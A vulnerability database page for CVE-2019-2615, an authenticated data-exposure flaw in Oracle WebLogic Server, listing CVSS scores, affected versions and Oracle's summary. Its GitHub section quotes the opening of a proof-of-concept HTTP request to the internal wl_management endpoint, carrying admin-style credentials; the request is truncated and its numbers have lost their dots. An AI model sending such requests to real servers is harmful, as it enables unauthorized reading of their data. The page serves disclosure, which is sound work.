4.9
CVSSv3

CVE-2019-2615

Published: 23/04/2019 Updated: 24/08/2020
CVSS v2 Base Score: 4 | Impact Score: 2.9 | Exploitability Score: 8
CVSS v3 Base Score: 4.9 | Impact Score: 3.6 | Exploitability Score: 1.2
VMScore: 356
Vector: AV:N/AC:L/Au:S/C:P/I:N/A:N

Vulnerability Summary

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.0 Base Score 4.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N).

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

oracle weblogic server 12.1.3.0.0

oracle weblogic server 10.3.6.0.0

oracle weblogic server 12.2.1.3.0

Github Repositories

CVE-2019-2615 GET /bea_wls_management_internal2/wl_management HTTP/11 Host: 1921685137:7001 User-Agent: Mozilla/50 (Windows NT 61; Win64; x64; rv:660) Gecko/20100101 Firefox/660 Accept: text/html,application/xhtml+xml,application/xml;q=09,/;q=08 Accept-Language: en-US,en;q=05 Accept-Encoding: gzip, deflate Connection: close username:weblogic password:admin123456 wl_r